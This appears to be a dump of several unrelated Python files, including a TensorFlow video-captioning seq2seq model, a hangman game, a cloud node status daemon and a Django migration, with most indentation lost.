|
999,394 | 6245a367c07b01e17273997c87e1c52b4f567fbe | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Definition of a basic seq2seq model
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from seq2seq import graph_utils
from pydoc import locate
import tensorflow as tf
from seq2seq.contrib.seq2seq import helper as tf_decode_helper
from seq2seq.data import vocab
from seq2seq.models.seq2seq_model import Seq2SeqModel
from seq2seq.graph_utils import templatemethod
from seq2seq.models import bridges
from seq2seq.inference import beam_search
from seq2seq.encoders.conv_encoder_utils import linear_mapping_weightnorm
class VCAP_ConvSeq2Seq(Seq2SeqModel):
"""Basic Sequence2Sequence model with a unidirectional encoder and decoder.
The last encoder state is used to initialize the decoder and thus both
must share the same type of RNN cell.
Args:
source_vocab_info: An instance of `VocabInfo`
for the source vocabulary
target_vocab_info: An instance of `VocabInfo`
for the target vocabulary
params: A dictionary of hyperparameters
"""
def __init__(self, params, mode, name="vcap_conv_seq2seq"):
super(VCAP_ConvSeq2Seq, self).__init__(params, mode, name)
self.encoder_class = locate(self.params["encoder.class"])
self.decoder_class = locate(self.params["decoder.class"])
@staticmethod
def default_params():
params = Seq2SeqModel.default_params().copy()
params.update({
"encoder.class": "seq2seq.encoders.ConvEncoderFairseq",
"encoder.params": {}, # Arbitrary parameters for the encoder
"decoder.class": "seq2seq.decoders.ConvDecoder",
"decoder.params": {}, # Arbitrary parameters for the decoder
"source.max_seq_len": 50,
"source.reverse": False,
"feature.dim":2048,
"feature.shape":[30,2048],
"target.max_seq_len": 50,
"embedding.dim": 256,
"embedding.init_scale": 0.04,
"embedding.share": False,
"position_embeddings.num_positions": 100,
"inference.beam_search.beam_width": 0,
"inference.beam_search.length_penalty_weight": 1.0,
"inference.beam_search.choose_successors_fn": "choose_top_k",
"vocab_source": "",
"vocab_target": "",
"optimizer.name": "Momentum",
"optimizer.learning_rate": 0.25,
"optimizer.params": {"momentum": 0.99, "use_nesterov": True}, # Arbitrary parameters for the optimizer
#"optimizer.params": { "epsilon": 0.0000008}, # Arbitrary parameters for the optimizer
"optimizer.lr_decay_type": "exponential_decay",
"optimizer.lr_decay_steps": 5000, # one epoch steps
"optimizer.lr_decay_rate": 0.9,
"optimizer.lr_start_decay_at": 0, # start annealing epoch 0
"optimizer.lr_stop_decay_at": tf.int32.max,
"optimizer.lr_min_learning_rate": 1e-5,
"optimizer.lr_staircase": True,
"optimizer.clip_gradients": 0.1,
"optimizer.clip_embed_gradients": 5,
"optimizer.sync_replicas": 0,
"optimizer.sync_replicas_to_aggregate": 0,
})
return params
def _preprocess(self, features, labels):
"""Model-specific preprocessing for features and labels:
In decoder pahse, the labels have add "END" and "START"
- Creates vocabulary lookup tables for target vocab
- Converts tokens into vocabulary ids
"""
    # Create vocabulary lookup for target
target_vocab_to_id, target_id_to_vocab, target_word_to_count, _ = \
vocab.create_vocabulary_lookup_table(self.target_vocab_info.path)
    # Add vocab tables to graph collection so that we can access them in
    # other places.
graph_utils.add_dict_to_collection({
"target_vocab_to_id": target_vocab_to_id,
"target_id_to_vocab": target_id_to_vocab,
"target_word_to_count": target_word_to_count
}, "vocab_tables")
if labels is None:
return features, None
labels = labels.copy()
# Slices targets to max length
if self.params["target.max_seq_len"] is not None:
labels["target_tokens"] = labels["target_tokens"][:, :self.params[
"target.max_seq_len"]]
labels["target_len"] = tf.minimum(labels["target_len"],
self.params["target.max_seq_len"])
# Look up the target ids in the vocabulary
labels["target_ids"] = target_vocab_to_id.lookup(labels["target_tokens"])
labels["target_len"] = tf.to_int32(labels["target_len"])
tf.summary.histogram("target_len", tf.to_float(labels["target_len"]))
# Add to graph collection for later use
graph_utils.add_dict_to_collection(features, "features")
if labels:
graph_utils.add_dict_to_collection(labels, "labels")
return features, labels
def source_embedding_fairseq(self):
"""Returns the embedding used for the source sequence.
"""
return tf.get_variable(
name="W",
shape=[self.params["feature.dim"], self.params["embedding.dim"]],
initializer=tf.random_normal_initializer(
mean=0.0,
stddev=0.1))
def target_embedding_fairseq(self):
"""Returns the embedding used for the target sequence.
"""
if self.params["embedding.share"]:
return self.source_embedding_fairseq()
return tf.get_variable(
name="W",
shape=[self.target_vocab_info.total_size, self.params["embedding.dim"]],
initializer=tf.random_normal_initializer(
mean=0.0,
stddev=0.1))
def source_pos_embedding_fairseq(self):
return tf.get_variable(
name="pos",
shape=[self.params["position_embeddings.num_positions"], self.params["embedding.dim"]],
initializer=tf.random_normal_initializer(
mean=0.0,
stddev=0.1))
def target_pos_embedding_fairseq(self):
return tf.get_variable(
name="pos",
shape=[self.params["position_embeddings.num_positions"], self.params["embedding.dim"]],
initializer=tf.random_normal_initializer(
mean=0.0,
stddev=0.1))
def _create_decoder(self, encoder_output, features, _labels):
config = beam_search.BeamSearchConfig(
beam_width=self.params["inference.beam_search.beam_width"],
vocab_size=self.target_vocab_info.total_size,
eos_token=self.target_vocab_info.special_vocab.SEQUENCE_END,
length_penalty_weight=self.params[
"inference.beam_search.length_penalty_weight"],
choose_successors_fn=getattr(
beam_search,
self.params["inference.beam_search.choose_successors_fn"]))
return self.decoder_class(
params=self.params["decoder.params"],
mode=self.mode,
vocab_size=self.target_vocab_info.total_size,
config=config,
target_embedding=self.target_embedding_fairseq(),
pos_embedding=self.target_pos_embedding_fairseq(),
start_tokens=self.target_vocab_info.special_vocab.SEQUENCE_END)
def _decode_train(self, decoder, _encoder_output, _features, labels):
"""Runs decoding in training mode"""
target_embedded = tf.nn.embedding_lookup(decoder.target_embedding,
labels["target_ids"])
return decoder(_encoder_output, labels=target_embedded[:,:-1], sequence_length=labels["target_len"]-1)
def _decode_infer(self, decoder, _encoder_output, features, labels):
"""Runs decoding in inference mode"""
return decoder(_encoder_output, labels)
@templatemethod("encode")
def encode(self, features, labels):
    # For video captioning, the model directly encodes the features from a deep CNN with positional embeddings.
source_embedded = linear_mapping_weightnorm(features['video'],self.params["embedding.dim"],\
var_scope_name="video_feat_mapping")
encoder_fn = self.encoder_class(self.params["encoder.params"], self.mode, None)
return encoder_fn(source_embedded, self.params["feature.shape"][0])
@templatemethod("decode")
def decode(self, encoder_output, features, labels):
decoder = self._create_decoder(encoder_output, features, labels)
if self.mode == tf.contrib.learn.ModeKeys.INFER:
return self._decode_infer(decoder, encoder_output, features,
labels)
else:
return self._decode_train(decoder, encoder_output, features,
labels)
|
999,395 | c0b8b973e6b942d1b558f0ec3007434950cb563a | from .abstract_pdf_constructor import AbstractQuantilePdfConstructor
from .cdf_spline_derivative import CdfSplineDerivative
from .dual_spline_average import DualSplineAverage
from .piecewise_constant import PiecewiseConstant
from .piecewise_linear import PiecewiseLinear
|
999,396 | d38c6188b0a8f5d0010efae438ac0dbd2c8206cd | import random
import time
print("\n Weilcom to Hangman game\n****@@@****\nCreated by: ABHISHEK SHARMA\n****@@@****")
name=input("Enter your name: \n")
print(f"HELLOW {name} ! BEST OF LUCK!")
time.sleep(2)
print("THE GAME IS GOING TO START \n LET'S PLAY......'")
time.sleep(3)
def main():
global count
global display
global word
global already_guessed
global length
global play_game
words_to_guess=["ABHISHEK","ANSHU","NEHA","RAGHAV","VANSH","TUTION","MRIDUL"]
word=random.choice(words_to_guess)
length=len(word)
count=0
display="_"*length
already_guessed=[]
play_game=""
def play_loop():
global play_game
play_game=input("DO YOU WANT TO PLAY AGAIN ? y=yes,n=no\n")
while play_game not in ["Y","N","y","n"]:
play_game = input("DO YOU WANT TO PLAY AGAIN ? y=yes,n=no\n")
if play_game == "y":
main()
elif play_game == "n":
print(f"THANK YOU PLAYING {name.upper()}! ")
exit()
def hangman():
global count
global display
global word
global already_guessed
global play_game
limit=5
guess=input(f"THIS IS THE HANGMAN WORD: {display} Enter your guess in capital letter:\n")
guess=guess.strip()
if len(guess.strip())==0 or len(guess.strip())>=2 or guess<="9":
print("INVALID INPUT, TRY A LETTER\n")
hangman()
    elif guess in word:
        already_guessed.extend([guess])
        index = word.find(guess)
        word = word[:index] + "_" + word[index+1:]
        display = display[:index] + guess + display[index+1:]  # reveal the guessed letter
        print(display + "\n")
elif guess in already_guessed:
print("TRY ANOTHER LETTER.\n")
else:
count +=1
if count==1:
time.sleep(2)
print(" _______\n"
" | \n"
" | \n"
" | \n"
" | \n"
" | \n"
" | \n"
"___|____ \n")
print("wrong guess."+ str(limit-count) +"guesses remaining \n")
elif count==2:
time.sleep(2)
print(" _____ \n"
" | | \n"
" | |\n"
" | \n"
" | \n"
" | \n"
" | \n"
"__|__\n")
print("Wrong guess. " + str(limit - count) + " guesses remaining\n")
elif count == 3:
time.sleep(1)
print(" _____ \n"
" | | \n"
" | |\n"
" | | \n"
" | \n"
" | \n"
" | \n"
"__|__\n")
print("Wrong guess. " + str(limit - count) + " guesses remaining\n")
elif count == 4:
time.sleep(1)
print(" _____ \n"
" | | \n"
" | | \n"
" | | \n"
" | O \n"
" | \n"
" | \n"
"__|__\n")
print("Wrong guess. " + str(limit - count) + " last guess remaining\n")
elif count == 5:
time.sleep(1)
print(" _____ \n"
" | | \n"
" | |\n"
" | | \n"
" | O \n"
" | /|\ \n"
" | / \ \n"
"__|__\n")
print("Wrong guess. You are hanged!!!\n")
print("The word was:",already_guessed,word)
play_loop()
if word == '_' * length:
print("**********@@@@@@@@@*********\n Congrats! You have guessed the word correctly!\n **********@@@@@@@@*********")
play_loop()
elif count != limit:
hangman()
main()
hangman()
|
999,397 | 433609a55b1e9195dccda64526b7c38de3f29bd6 | #! /usr/bin/python3
# -*- coding:utf8 -*-
'''
问:正常方法和静态方法有何不同?
答:正常方法需要接受第一个self参数,但是静态方法只是嵌套在类对象中的简单函数,不需要传入实例。为了使一个方法成为静态方法,它必须可以通过特殊的内置函数运行,或者使用装饰器进行装饰。Python3.x允许通过类而不需这个步骤就调用类中的简单函数,但通过实例调用时仍需要静态方法声明。
'''
|
999,398 | 5bf7c1115c8533ea89560251bf5eaf3323eeac94 | from luhyaapi.educloudLog import *
from luhyaapi.hostTools import *
from luhyaapi.rabbitmqWrapper import *
from luhyaapi.vboxWrapper import *
from luhyaapi.settings import *
import time, psutil, requests, os, memcache
logger = getncdaemonlogger()
class nc_statusPublisher():
def __init__(self, ):
logger.error("nc_status_publisher start running")
self._ccip = getccipbyconf(mydebug=DAEMON_DEBUG)
self._old_running_vms = []
self._new_running_vms = []
logger.error("cc ip = %s" % self._ccip)
    def job5minutes(self):
os.system("chown luhya:luhya /var/log/educloud/*")
try:
node_status = self.collect_node_status()
self.send_node_status_to_cc(node_status)
except Exception as e:
logger.error('nc_statusPublisherThread exception = %s' % str(e))
# find those vms in self._old_running_vms but not in self._new_running_vms
def find_terminated_vms(self):
result = []
for oldvm in self._old_running_vms:
if oldvm not in self._new_running_vms:
result.append(oldvm)
return result
def job30seconds(self):
logger.error("start job30seconds")
vms = os.listdir('/storage/VMs/')
terminated_vms = getNotRunningVMs(vms)
logger.error("terminated vms = %s" % json.dumps(terminated_vms))
mc = memcache.Client(['127.0.0.1:11211'], debug=0)
for tvm in terminated_vms:
is_really_stopped = False
try:
key = "nc_startvm#" + str(tvm)
payload = mc.get(key)
logger.error("retrieve data from memcache as %s - %s" % (key, payload))
                if payload is None:
logger.error("find %s is indeed terminated already" % tvm)
is_really_stopped = True
else:
logger.error("find %s is still booting" % tvm)
is_really_stopped = False
except Exception as e:
is_really_stopped = True
            if is_really_stopped:
message = {}
message['type'] = "cmd"
message['op'] = 'ndp/stop'
message['tid'] = tvm
message['runtime_option'] = ""
_message = json.dumps(message)
zmq_send("127.0.0.1", _message, NC_CMD_QUEUE_PORT)
# every 5 minutes:
# - /var/log/educloud/*.log chown luhya:luhya
# - send node status to cc
# every 30 seconds(if RDP):
# - collect current running vms
# - compare to previous ones
# - send ndp stop message to cc to clc
def run(self):
index = 0
self.job30seconds()
        self.job5minutes()
while True:
time.sleep(30)
index += 1
self.job30seconds()
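            # index == 9 fires after 9 sleeps of 30 s (~4.5 min), approximating the 5-minute job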
if index == 9:
index = 0
                self.job5minutes()
def collect_node_status(self):
payload = { }
payload['type'] = 'nodestatus'
try:
payload['service_data'] = getServiceStatus('nc')
except Exception as e:
logger.error('getServiceStatus exception = %s' % str(e))
try:
payload['hardware_data'] = getHostHardware()
except Exception as e:
logger.error('getHostHardware exception = %s' % str(e))
try:
payload['net_data'] = getHostNetInfo()
except Exception as e:
logger.error('getHostNetInfo exception = %s' % str(e))
try:
payload['vm_data'] = getVMlist()
except Exception as e:
logger.error('getVMlist exception = %s' % str(e))
payload['nid'] = "nc#" + payload['net_data']['mac0'] + "#status"
logger.error("nc_statusPublisher data \n%s" % json.dumps(payload, indent=4))
return payload
def send_node_status_to_cc(self, node_status):
simple_send(logger, self._ccip, 'cc_status_queue', json.dumps(node_status))
def getRuntimeOption():
return ''
def registerMyselfasNC():
ccip = getccipbyconf(mydebug=DAEMON_DEBUG)
ccname = getccnamebyconf()
hostname, hostcpus, hostmem, hostdisk = getHostAttr()
netlist = getHostNetInfo()
if isLNC():
if DAEMON_DEBUG == True:
url = 'http://%s:8000/cc/api/1.0/register/lnc' % ccip
else:
url = 'http://%s/cc/api/1.0/register/lnc' % ccip
payload = {
'ip': netlist['ip0'],
'mac': netlist['mac0'],
'name': hostname,
'ccname': ccname,
'location': '',
'hypervisor': getHypervisor(),
'cores': hostcpus,
'memory': hostmem,
'disk': hostdisk,
            'runtime_option': getRuntimeOption()
}
else:
if DAEMON_DEBUG == True:
url = 'http://%s:8000/cc/api/1.0/register/server' % ccip
else:
url = 'http://%s/cc/api/1.0/register/server' % ccip
payload = {
'role': 'nc',
'name': hostname,
'cores': hostcpus,
'memory': hostmem,
'disk': hostdisk,
'exip': netlist['exip'],
'ip0': netlist['ip0'],
'ip1': netlist['ip1'],
'ip2': netlist['ip2'],
'ip3': netlist['ip3'],
'mac0': netlist['mac0'],
'mac1': netlist['mac1'],
'mac2': netlist['mac2'],
'mac3': netlist['mac3'],
'hypervisor': getHypervisor(),
'ccname': ccname,
}
r = requests.post(url, data=payload)
msg = json.loads(r.content)
if msg['Result'] == "OK":
logger.error("register NC %s succeed !" % netlist['ip0'])
else:
logger.error("register NC %s failed !" % netlist['ip0'])
def main():
# read /storage/config/cc.conf to register itself to cc
registerMyselfasNC()
publisher = nc_statusPublisher()
publisher.run()
if __name__ == '__main__':
main()
|
999,399 | 9c00a77c36b92ebe4f6383f5f62f4b834b5780f8 | # Generated by Django 3.1.2 on 2021-07-31 04:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recommapp', '0009_auto_20210730_2320'),
]
operations = [
migrations.AddField(
model_name='review',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True),
),
migrations.AlterField(
model_name='review',
name='comment',
field=models.CharField(max_length=200),
),
]
|